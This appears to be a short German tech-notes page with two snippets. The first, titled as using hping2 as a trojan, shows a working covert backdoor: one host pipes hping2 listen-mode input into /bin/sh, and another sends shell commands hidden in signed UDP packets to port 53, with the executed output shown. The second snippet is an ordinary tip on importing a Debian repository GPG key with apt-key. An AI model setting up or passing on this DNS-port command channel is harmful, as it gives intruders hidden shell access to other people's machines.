HPing2 im Einsatz als Trojaner

  1.  
  2. [root@localhost root]# hping 192.168.10.66 –listen signature –safe –udp -p 53 |/bin/sh
  3. hping2 listen mode
  4. amsn_received lib
  5. readme.txt
  6. anaconda-ks.cfg libfwbuilder-0.10.13-1.rh7.i386.rpm
  7. report.html
  8. avi license.txt
  9. sbin
  10. CPsrsc-50-02.i386.rpm linux-wlan-ng-0.1.16-pre5
  11. scripts
  13.  

on the other site

  1.  
  2. [root@knoppix root]# echo ls >test.cmd
  3. [root@knoppix root]# hping 192.168.10.44 -p 53 -d 100 –udp –sign siganature –file ./test.cmd
  4.  

apt-get und gpg

Um Pakete aus dem Bereich “Security” via apt-get update zu holen ist ein PGP-Key nötig, der den Apt-Server als vertrauenswürdig kennzeichnet. Die Fehlermeldung hatte bei mir folgende Ausgabe: GPG error: ftp://ftp.de.debian.org testing Release: The following signatures couldn’t be verified because the public key is not available: NO_PUBKEY 010908312D230C5F Um den Public Key zu besorgen gehtt man  wie folgt vor:

gpg –keyserver pgp.mit.edu –recv-keys 2D230C5F

Wie leicht zu erkennen ist genügt es hier die letzten 8 Stellen anzugeben. Dannach muss man den Schlüssel exportieren und für das apt-get Script als vertrauenswürdigen Key hinzufügen:

gpg –armor –export 2D230C5F | apt-key add -

Bei einem erneuten “apt-get update” sollte nun keine Fehlermeldung mehr kommen.

nach oben